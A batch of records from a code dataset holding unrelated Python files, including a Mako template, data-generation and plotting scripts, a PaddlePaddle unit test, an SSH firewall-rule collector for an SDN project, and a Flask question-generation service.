print(l.org_sen, l.corr_sen, l.is_delete, [t.type for t in l.error_type.all()], l.dateTime)\n err0, type = TypeManager.getTypeByName('case', self.user.id)\n print(\"++++\")\n err5, resList = SenManager.getSentencesByTypeName('case', self.user.id)\n self.assertEqual(err5, 'succeed')\n for l in resList:\n print(l.org_sen, l.corr_sen, l.is_delete, [t.type for t in l.error_type.all()], l.dateTime)\n","sub_path":"gec_backend/test/testSentence.py","file_name":"testSentence.py","file_ext":"py","file_size_in_byte":4067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"327401355","text":"# -*- 
coding:ascii -*-\nfrom mako import runtime, filters, cache\nUNDEFINED = runtime.UNDEFINED\n__M_dict_builtin = dict\n__M_locals_builtin = locals\n_magic_number = 10\n_modified_time = 1414172190.393\n_enable_loop = True\n_template_filename = 'C:\\\\DjangoMako\\\\ITILITY\\\\homepage\\\\templates/edit_location.html'\n_template_uri = 'edit_location.html'\n_source_encoding = 'ascii'\nimport os, os.path, re\n_exports = [u'content']\n\n\ndef _mako_get_namespace(context, name):\n try:\n return context.namespaces[(__name__, name)]\n except KeyError:\n _mako_generate_namespaces(context)\n return context.namespaces[(__name__, name)]\ndef _mako_generate_namespaces(context):\n pass\ndef _mako_inherit(template, context):\n _mako_generate_namespaces(context)\n return runtime._inherit_from(context, u'base.htm', _template_uri)\ndef render_body(context,**pageargs):\n __M_caller = context.caller_stack._push_frame()\n try:\n __M_locals = __M_dict_builtin(pageargs=pageargs)\n def content():\n return render_content(context._locals(__M_locals))\n form = context.get('form', UNDEFINED)\n __M_writer = context.writer()\n __M_writer(u'\\n\\n')\n if 'parent' not in context._data or not hasattr(context._data['parent'], 'content'):\n context['self'].content(**pageargs)\n \n\n __M_writer(u'\\n')\n return ''\n finally:\n context.caller_stack._pop_frame()\n\n\ndef render_content(context,**pageargs):\n __M_caller = context.caller_stack._push_frame()\n try:\n def content():\n return render_content(context)\n form = context.get('form', UNDEFINED)\n __M_writer = context.writer()\n __M_writer(u'\\n\\n

\\n

Edit Location:

\\n\\n \\n
\\n
\\n \\n \\n ')\n __M_writer(unicode( form ))\n __M_writer(u'\\n \\n
\\n \\n \\n Cancel\\n
\\n\\n')\n return ''\n finally:\n context.caller_stack._pop_frame()\n\n\n\"\"\"\n__M_BEGIN_METADATA\n{\"source_encoding\": \"ascii\", \"line_map\": {\"35\": 1, \"40\": 21, \"46\": 3, \"53\": 3, \"54\": 13, \"55\": 13, \"27\": 0, \"61\": 55}, \"uri\": \"edit_location.html\", \"filename\": \"C:\\\\DjangoMako\\\\ITILITY\\\\homepage\\\\templates/edit_location.html\"}\n__M_END_METADATA\n\"\"\"\n","sub_path":"homepage/cached_templates/templates/edit_location.html.py","file_name":"edit_location.html.py","file_ext":"py","file_size_in_byte":2466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"497157131","text":"from random import normalvariate, randint, randrange, sample\nfrom collections import namedtuple\nfrom datetime import date, timedelta\n\nListing = namedtuple('Listing',\n ['num_bedrooms', 'num_bathrooms', 'living_area', 'lat', 'lon',\n 'exterior_stories', 'pool', 'dwelling_type',\n 'list_date', 'list_price', 'close_date', 'close_price'])\n\n\nDWELLING_TYPES = {'single-family', 'townhouse', 'apartment', 'patio', 'loft'}\nPOOL_TYPES = {'private', 'community', 'none'}\n\n\ndef generate_datum():\n \"\"\"Returns a synthetic Listing in the Phoenix area\"\"\"\n num_bedrooms = randint(1, 4)\n num_bathrooms = randint(1, 4)\n living_area = randint(1e3, 5e3)\n list_date = random_date(date(1999, 1, 1), date(2015, 6, 1))\n list_price = randint(100e3, 500e3)\n lat = randint(33086, 33939) / float(1e3)\n lon = randint(-112649, -111437) / float(1e3)\n exterior_stories = randint(1, 3)\n pool = sample(POOL_TYPES, 1)[0]\n dwelling_type = sample(DWELLING_TYPES, 1)[0]\n is_closed = randrange(8) < 10 # 80% of listings close\n\n if is_closed:\n dom = randint(7, 180)\n list_to_close = normalvariate(0.03, 0.06)\n close_date = list_date + timedelta(days=dom)\n close_price = list_price * (1 - list_to_close)\n else:\n close_date = None\n close_price = None\n\n return Listing(num_bedrooms, num_bathrooms, living_area, lat, lon,\n exterior_stories, pool, dwelling_type,\n list_date, list_price, close_date, close_price)\n\n\ndef random_date(start_date, end_date):\n \"\"\"Returns a random date between start_date and end_date\"\"\"\n delta = end_date - start_date\n return start_date + timedelta(days=randrange(delta.days))","sub_path":"generate_data.py","file_name":"generate_data.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"153778841","text":"import scanpy as sc\nfrom pathlib import Path\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport pandas as pd\n\n#--------------------variable----------------------------\nfmt='tif'\n\nfd_in='./out/a02_modularity_01_anno'\nfd_out='./out/a03_plot-modu_01_pieplot'\n\nl_sample=['Ctrl', 'MethFix', 'RNAlater']\nl_cell=['Marginal', 'Intermediate', 'Basal','Spindle-Root'] \ncmap=['#F8766D', '#00BA38', '#619CFF', 'orange']\n\n#----------------------setup----------------------------\nPath(fd_out).mkdir(exist_ok=True, parents=True)\ndf_cnt=pd.read_csv(f'{fd_out}/cnt.csv')\n\n#--------------------function--------------------------\ndef load_adata(fname):\n\tadata=sc.read(fname)\n\tadata.obs['cell']=adata.obs['anno'].astype('str')\n\tadata.obs['cell']=adata.obs['cell'].replace(['Spindle-Root-1', 'Spindle-Root-2'], ['Spindle-Root', 'Spindle-Root'])\n\treturn adata\n\ndef count_cells(adata, l_cell, col='cell'):\n\t#count cell number in adata\n\tl_data=[]\n\tfor cell in 
l_cell:\n\t\tn=adata.obs.loc[adata.obs[col].str.contains(cell),:].shape[0]\n\t\tl_data.append((cell, n))\n\tdf=pd.DataFrame(l_data, columns=['cell', 'count'])\n\treturn df\n\ndef pieplot_sum(df, title, f_out, cmap=cmap, col_cnts='count', col_cells='cell', figsize=(10,10), labels=None):\n\t#labels=df[col_cells], if need cell label\n\ttotal=df[col_cnts].sum()\n\tfig, ax=plt.subplots(figsize=figsize)\n\tax.pie(df[col_cnts], colors=cmap, labels=labels, textprops={'fontsize':45}, autopct='%1.1f%%')\n\tax.set_title(title, fontsize=60, weight='medium')\n\tplt.tight_layout()\n\tplt.savefig(f_out, dpi=300)\n\tplt.close()\n\treturn\n\t\n#######################################################################\n##--------------------pie plot---------------------------\n#for sample in l_sample:\n#\t#1. set var\n#\tadata=load_adata(f'{fd_in}/{sample}.h5ad')\n#\t\n#\t#2. count\n#\tdf=count_cells(adata, l_cell)\n#\t\n#\t#3. pie plot\n#\tf_out=f'{fd_out}/pie_{sample}.{fmt}'\n#\tpieplot_sum(df, sample, f_out)\n#\t\n#\t#5. plot legend\n#\tfig, ax=plt.subplots(figsize=(10, 10))\n#\tsns.despine()\n#\tax=sns.barplot(x='cell', y='count', data=df, hue='cell', palette=cmap)\n#\tplt.ylim([0, 1000])\n#\tax.legend(frameon=False, prop={'size': 25})\n#\tplt.tight_layout()\n#\tplt.savefig(f'{fd_out}/legend.{fmt}', dpi=300)\n#\tplt.close()\n\t\n#-------------pieplot on counting data--------------------\nf_out=f'{fd_out}/pie_esimated.{fmt}'\ntitle='Esitmated %'\npieplot_sum(df_cnt, title, f_out)\n\n\n","sub_path":"a03_plot-modu_01_pieplot.py","file_name":"a03_plot-modu_01_pieplot.py","file_ext":"py","file_size_in_byte":2375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"182430785","text":"import re\r\nimport csv\r\nimport sys\r\n\r\n\r\nfile = open(sys.argv[-2], \"r\")\r\ncontent = file.read()\r\nfile.close()\r\n\r\ntags = re.findall(r\"[\\s\\S]+?data-event-category=\\\"Job Link\\\"[\\s\\S]+?\", content) # finds rows in table\r\n\r\nvacancies = []\r\nfor i in tags:\r\n tmp = re.findall(r\">\\s*([^<>]*?\\w[^<>]*?)\\s*?<\" , i) # finds info in rows\r\n for i in range(3, len(tmp)): # in case of multiple locations for that vacancy\r\n vacancies.append([tmp[0], tmp[1], tmp[2], tmp[i]])\r\n\r\nwith open(sys.argv[-1], 'w', newline='') as csvfile:\r\n spamwriter = csv.writer(csvfile, delimiter=',')\r\n spamwriter.writerow(['Job Title', 'Category', 'Status', 'Location'])\r\n for vacancy in vacancies:\r\n spamwriter.writerow([x.replace(\"&\", \"&\") for x in vacancy])\r\n\r\nprint(\"Done\")\r\n","sub_path":"Extractor.py","file_name":"Extractor.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"407570501","text":"# Copyright (c) 2021 PaddlePaddle Authors. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport numpy as np\nimport unittest\nimport sys\n\nsys.path.append(\"..\")\nfrom op_test import OpTest\nimport paddle\nimport paddle.fluid as fluid\n\npaddle.enable_static()\n\n\ndef sigmoid_array(x):\n return 1 / (1 + np.exp(-x))\n\n\n@unittest.skipIf(\n not paddle.is_compiled_with_npu(), \"core is not compiled with NPU\"\n)\nclass TestLogLossOp(OpTest):\n def setUp(self):\n self.set_npu()\n self.op_type = 'log_loss'\n self.place = paddle.NPUPlace(0)\n\n self.init_dtype()\n\n self.set_inputs()\n self.set_attrs()\n self.set_outputs()\n\n def set_inputs(self):\n samples_num = 100\n x = np.random.random((samples_num, 1)).astype(self.dtype)\n predicted = sigmoid_array(x)\n labels = np.random.randint(0, 2, (samples_num, 1)).astype(self.dtype)\n self.inputs = {'Predicted': predicted, 'Labels': labels}\n\n def set_attrs(self):\n epsilon = 1e-7\n self.attrs = {'epsilon': epsilon}\n\n def set_outputs(self):\n epsilon = self.attrs['epsilon']\n labels = self.inputs['Labels']\n predicted = self.inputs['Predicted']\n loss = -labels * np.log(predicted + epsilon) - (1 - labels) * np.log(\n 1 - predicted + epsilon\n )\n self.outputs = {'Loss': loss}\n\n def set_npu(self):\n self.__class__.use_npu = True\n\n def init_dtype(self):\n self.dtype = np.float32\n\n def test_check_output(self):\n self.check_output_with_place(self.place)\n\n def test_check_grad(self):\n self.check_grad_with_place(self.place, ['Predicted'], 'Loss')\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"python/paddle/fluid/tests/unittests/npu/test_log_loss_op_npu.py","file_name":"test_log_loss_op_npu.py","file_ext":"py","file_size_in_byte":2235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"417764864","text":"import numpy as np\n\ndef atomshift(input_dict, **kwargs):\n \"\"\"\n Converts the atomshift input term string into a list of floats.\n \n The input_dict keys used by this function (which can be renamed using the \n function's keyword arguments):\n atomshift -- a string of space-delimited numbers. 
This function converts it\n to a list of floats.\n \n Argument:\n input_dict -- dictionary containing input parameter key-value pairs\n \n Keyword Arguments:\n atomshift -- replacement parameter key name for 'atomshift'\n \"\"\"\n #Set default keynames\n keynames = ['atomshift']\n for keyname in keynames:\n kwargs[keyname] = kwargs.get(keyname, keyname)\n \n #Give default values for terms\n input_dict[kwargs['atomshift']] = input_dict.get(kwargs['atomshift'], '0 0 0')\n \n #Convert into list of floats\n input_dict[kwargs['atomshift']] = list(np.array(input_dict[kwargs['atomshift']].strip().split(), dtype=float))","sub_path":"iprPy/input/atomshift.py","file_name":"atomshift.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"496124662","text":"import socket\nimport paramiko\nimport time\nfrom Crypto.PublicKey import RSA\nfrom Crypto import Random\n\nfrom config import *\nfrom encrypt import *\n\n\nRETRY = []\nRETRY.append('cd SDN/host/ && sudo python3 encrypt.py')\n\n\ndef load_key():\n with open (Config.BASE_PATH + 'private.pem', 'rb') as f:\n priv_key = RSA.importKey(f.read())\n \n return priv_key\n\n\ndef ip_convert(ip):\n if ip == '172.26.17.121':\n ip = '1'\n elif ip == '172.26.17.122':\n ip = '2'\n elif ip == '172.26.17.124':\n ip = '4'\n elif ip == '172.26.17.125':\n ip = '5'\n elif ip == '172.26.17.126':\n ip = '6'\n elif ip == '172.26.17.127':\n ip = '7'\n elif ip == '172.26.17.128':\n ip = '8'\n elif ip == '172.26.17.129':\n ip = '9'\n elif ip == '172.26.17.130':\n ip = '10'\n elif ip == '172.26.17.131':\n ip = '11'\n elif ip == '172.26.17.132':\n ip = '12'\n\n return ip\n\n\ndef recv_file(host_ips):\n ssh = paramiko.SSHClient()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n for ip in host_ips:\n ssh.connect(ip, username=Config.HOST_USERNAME, password=Config.HOST_PASSWORD)\n name = ip_convert(ip)\n sftp = ssh.open_sftp()\n sftp.get(Config.HOST_BASE_PATH + \"host_pi_\" + name + \".rules.enc\", Config.BASE_PATH + \"controller_pi_\" + name + \".rules.enc\")\n sftp.close()\n ssh.close()\n\n\ndef dec_files(priv_key, host_ips):\n retry_hosts = []\n for ip in host_ips:\n name = ip_convert(ip)\n enc_file = Config.BASE_PATH + \"controller_pi_\" + name + \".rules.enc\"\n rules_file = enc_file[:-4]\n with open(enc_file, 'rb') as enc_f, open(rules_file, 'w') as dec_f:\n while True:\n encrypted = enc_f.read(Config.CHUNK_SIZE)\n if encrypted == b'':\n break\n decrypted = priv_key.decrypt(encrypted)\n try:\n dec_f.write(decrypted.decode())\n except:\n retry_hosts.append(ip)\n dec_f.write(b'-error'.decode())\n break\n\n return retry_hosts\n\n\ndef retry(retry_hosts):\n send_key(retry_hosts, RETRY)\n priv_key = load_key()\n recv_file(retry_hosts)\n retry_hosts = dec_files(priv_key, retry_hosts)\n if retry_hosts:\n retry(retry_hosts)\n\n\ndef collect_all():\n print(\"=====loading key=====\")\n priv_key = load_key()\n print(\"=====receiving data=====\")\n recv_file(Config.HOST_IPS)\n print(\"=====decrypting data=====\")\n retry_hosts = dec_files(priv_key, Config.HOST_IPS)\n if retry_hosts:\n retry(retry_hosts)\n print(\"=====end program=====\")\n\n\nif __name__ == '__main__':\n collect_all()","sub_path":"IEEE-Access-Proactive-Firewall/controller/collect.py","file_name":"collect.py","file_ext":"py","file_size_in_byte":2730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"362498997","text":"\n#\n# Team 1\n# My Weekend in 
Miami\n#\n\nimport budget\nimport hotel_setup\nimport activities\nimport restaurant_setup\nimport db # Used to build temporary database\nimport os # Used to delete temporary database\n\n\"\"\"\n\nPURPOSE:\nModule that takes in the maximum amount a user wants to spend per person\non their weekend in Miami and outputs a weekend itinerary that satisfies these\nbudget constraints.\n\nThis module calls on the Budget, Hotel, Activities, and Meals modules. An\ninstance of each of these classes is a member attribute of each instance of\nthe Itinerary class.\n\n\n\"\"\"\n\n\nclass Itinerary:\n\n def __init__(self, maxbudget):\n \"\"\"\n Itinerary Constructor\n Parameter: maxbudget (int)\n maximum amount (per person) the user is willing to spend on their vacation\n Return:\n Itinerary instance\n \"\"\"\n # Determine budget\n trip_budget = budget.Budget(maxbudget)\n\n # Initialize temporary database\n dbname = \"temporary.db\"\n db.create(dbname)\n db.parseLodging(dbname)\n db.parseEnt(dbname)\n db.parseRest(dbname)\n\n # Choose hotel\n hotel = hotel_setup.Hotel(dbname, trip_budget.accomodations, 1)\n hotel.pick_hotel()\n self.hotel = hotel\n\n # Choose entertainment\n ent = activities.Activities(trip_budget.activities, dbname)\n ent.pick_activities()\n self.ent = ent\n\n # Choose restaurants\n rest = restaurant_setup.Restaurant(dbname, 1, trip_budget.meals)\n restLst = rest.pick_restaurant()\n self.meals = restLst\n\n # Set expenses attributes\n self.hotel_exp = self.hotel.cost * 2\n self.ent_exp = (self.ent.friday_eve[8] + self.ent.saturday_mor[8] +\n self.ent.saturday_aft[8] + self.ent.saturday_eve[8] +\n self.ent.sunday_mor[8])\n self.meals_exp = (self.get_rest_price(self.meals[0][4]) +\n self.get_rest_price(self.meals[1][4]) +\n self.get_rest_price(self.meals[2][4]) +\n self.get_rest_price(self.meals[3][4]) +\n self.get_rest_price(self.meals[4][4]))\n self.total_exp = self.hotel_exp + self.ent_exp + self.meals_exp\n\n # Delete temporary database\n if os.path.exists(\"temporary.db\"):\n os.remove(\"temporary.db\")\n else:\n errMsg = \" -- Anomalous Behavior Warning -- \\n\"\n errMsg += \"Itinerary tried to remove temporary.db \"\n errMsg += \"but file does not exist.\\n\"\n raise Exception(errMsg)\n\n\n def get_rest_price(self, rest_price):\n if (rest_price == 1):\n return 10\n elif (rest_price == 2):\n return 25\n elif (rest_price == 3):\n return 50\n else:\n return 65\n\n\n def get_itinerary_str(self):\n output = f\"-- Itinerary -- \\n\\n\"\n output += f\"Hotel: {self.hotel.name}\\n\"\n output += f\" ${self.hotel.cost} per night\\n\"\n output += f\" ${self.hotel.cost * 2} total\\n\\n\"\n output += f\"Friday \\n\"\n output += f\" Activities: \\n\"\n output += f\" Morning: N/A \\n\"\n output += f\" Afternoon: Arrival \\n\"\n output += f\" Evening: {self.ent.friday_eve[1]}\\n\"\n output += f\" ${self.ent.friday_eve[8]}\\n\"\n output += f\" {self.ent.friday_eve[12]}\\n\"\n output += f\" Meals: \\n\"\n output += f\" Dinner: {self.meals[0][1]} \\n\"\n output += f\" ${self.get_rest_price(self.meals[0][4])}\\n\"\n output += f\"Saturday \\n\"\n output += f\" Activities: \\n\"\n output += f\" Morning: {self.ent.saturday_mor[1]}\\n\"\n output += f\" ${self.ent.saturday_mor[8]}\\n\"\n output += f\" {self.ent.saturday_mor[12]}\\n\"\n output += f\" Afternoon: {self.ent.saturday_aft[1]}\\n\"\n output += f\" ${self.ent.saturday_aft[8]}\\n\"\n output += f\" {self.ent.saturday_aft[12]}\\n\"\n output += f\" Evening: {self.ent.saturday_eve[1]}\\n\"\n output += f\" ${self.ent.saturday_eve[8]}\\n\"\n output += f\" 
{self.ent.saturday_eve[12]}\\n\"\n output += f\" Meals: \\n\"\n output += f\" Breakfast: {self.meals[1][1]} \\n\"\n output += f\" ${self.get_rest_price(self.meals[1][4])}\\n\"\n output += f\" Lunch: {self.meals[2][1]} \\n\"\n output += f\" ${self.get_rest_price(self.meals[2][4])}\\n\"\n output += f\" Dinner: {self.meals[3][1]} \\n\"\n output += f\" ${self.get_rest_price(self.meals[3][4])}\\n\"\n output += f\"Sunday \\n\"\n output += f\" Activities: \\n\"\n output += f\" Morning: {self.ent.sunday_mor[1]}\\n\"\n output += f\" ${self.ent.sunday_mor[8]}\\n\"\n output += f\" {self.ent.sunday_mor[12]}\\n\"\n output += f\" Afternoon: Departure \\n\"\n output += f\" Evening: N/A \\n\"\n output += f\" Meals: \\n\"\n output += f\" Breakfast: {self.meals[4][1]} \\n\"\n output += f\" ${self.get_rest_price(self.meals[4][4])}\\n\"\n output += f\" Lunch: N/A \\n\"\n output += f\" Dinner: N/A \\n\"\n\n return output\n\n\n def get_expenses_str(self):\n output = f\"-- Expenses -- \\n\\n\"\n output += f\"Lodging: ${self.hotel_exp}\\n\"\n output += f\"Meals: ${self.meals_exp}\\n\"\n output += f\"Entertainment: ${self.ent_exp}\\n\\n\"\n output += f\"TOTAL: ${self.total_exp}\\n\"\n\n return output\n","sub_path":"itinerary.py","file_name":"itinerary.py","file_ext":"py","file_size_in_byte":5824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"97147228","text":"import os\nfrom flask import Flask\nfrom flask import render_template, request\nfrom t5_inf import RaceInfModule\n\n# Flask App\napp = Flask(__name__)\napp.config[\"TEMPLATES_AUTO_RELOAD\"] = True\napp.config[\"APPLICATION_ROOT\"] = os.environ.get(\"APP_ROOT\",\"/service\")\n\n# Model\nq_model = RaceInfModule.load_from_checkpoint(app.config[\"APPLICATION_ROOT\"]+\"/ckpts/t5_que.ckpt\")\nq_model.eval()\nd_model = RaceInfModule.load_from_checkpoint(app.config[\"APPLICATION_ROOT\"]+\"/ckpts/t5_dis.ckpt\")\nd_model.eval()\n\n\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\",app_root=app.config[\"APPLICATION_ROOT\"])\n\n\n@app.route(\"/predict\",methods=[\"POST\"])\ndef predict():\n global q_model, d_model\n \n article=request.json[\"article\"]\n answer = request.json[\"answer\"]\n print(\"Start generating..\")\n question = q_model.generate_sentence(article, answer)\n print(\"Question generated!\")\n distractor = d_model.generate_sentence(article, answer, question)\n print(\"Distractor generated!\")\n\n generation = {'question': question, 'distractor': distractor}\n generation_html=render_template(\"result.html\",generation=generation)\n return {\"generation_html\":generation_html}\n\n\n@app.route(\"/predict_json\",methods=[\"POST\"])\ndef predict_json():\n global q_model, d_model\n\n article = request.json[\"article\"]\n answer = request.json[\"answer\"]\n question = q_model.generate_sentence(article, answer)\n distractor = d_model.generate_sentence(article, answer, question)\n\n generation = {'question': question, 'distractor': distractor}\n return {\"generation\":generation}\n","sub_path":"project/service/serve.py","file_name":"serve.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"206429589","text":"import numpy as np\nimport copy\nimport ROOT as rt\npts=[100,200,500,1000]\nevents=['jj','qq','gg','qg','zj','zq','zg']\n#cut=\"pt>{} && pt < {} && eta<1 && eta > -1\"\ncut=\"pt>{} && pt < 
{}\"\nfs=25\n#f=open(\"etacrosssection\")\nf=open(\"effectivecrosssection\")\ncross=eval(\"\".join(f.readlines()))\nf.close()\nentries=copy.deepcopy(cross)\ncutentries=copy.deepcopy(cross)\nfor i in range(len(pts)):\n for ev in events:\n pt=pts[i]\n if(pt==100):\n ptmin=0.815*pt\n ptmax=1.159*pt\n if(pt==200):\n ptmin=0.819*pt\n ptmax=1.123*pt\n if(pt==500):\n ptmin=0.821*pt\n ptmax=1.093*pt\n if(pt==1000):\n ptmin=0.8235*pt\n ptmax=1.076*pt\n f=rt.TFile(\"Data/{}_pt_{}_{}.root\".format(ev,pts[i],int(1.1*pts[i])),'read')\n entries[ev][i]=f.Get(\"jetAnalyser\").GetEntries()\n cutentries[ev][i]=f.Get(\"jetAnalyser\").GetEntries(cut.format(ptmin,ptmax))\n cross[ev][i]=format(cross[ev][i]/entries[ev][i]*cutentries[ev][i],'.2e')\n f.Close()\nfor k in cross:\n a=\" {} |\"*5\n a=\"|\"+a\n print(a.format(k,*cross[k]))\n","sub_path":"howcross.py","file_name":"howcross.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"97147228","text":"import os\n\n# path = './trdg/dicts/kr.txt'\npath = 'kr_new.txt'\n\nkorean = 0\nenglish = 0\ndigits = 0\nsymbol = 0 \n\nother = {} \n\nnew_f = open('kr3.txt', 'w', encoding='utf8')\n\nwith open(path, 'r', encoding='utf8') as f:\n\n line = f.readline().strip()\n while (line):\n valid = True\n for ch in line: \n if ord('가') <= ord(ch) <= ord('힣') : \n korean += 1 \n elif ord('a') <= ord(ch) <= ord('z') or ord('A') <= ord(ch) <= ord('Z'):\n english += 1\n elif ch in ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']:\n digits += 1\n elif ch in ['.', '(', ')', '-' ] :\n symbol += 1\n else:\n if other.get(ch) is not None:\n other[ch] += 1\n else:\n other[ch] = 1 \n valid = False \n break\n\n if valid:\n new_f.write(line + '\\n')\n\n line = f.readline().strip()\n\nnew_f.close()\n\nprint (f'korean: {korean} english: {english} digits:{digits} symbol: {symbol}')\n\nfor k, v in other.items():\n print (f'{k} {v}')\n\n\n","sub_path":"kr_data_stats.py","file_name":"kr_data_stats.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}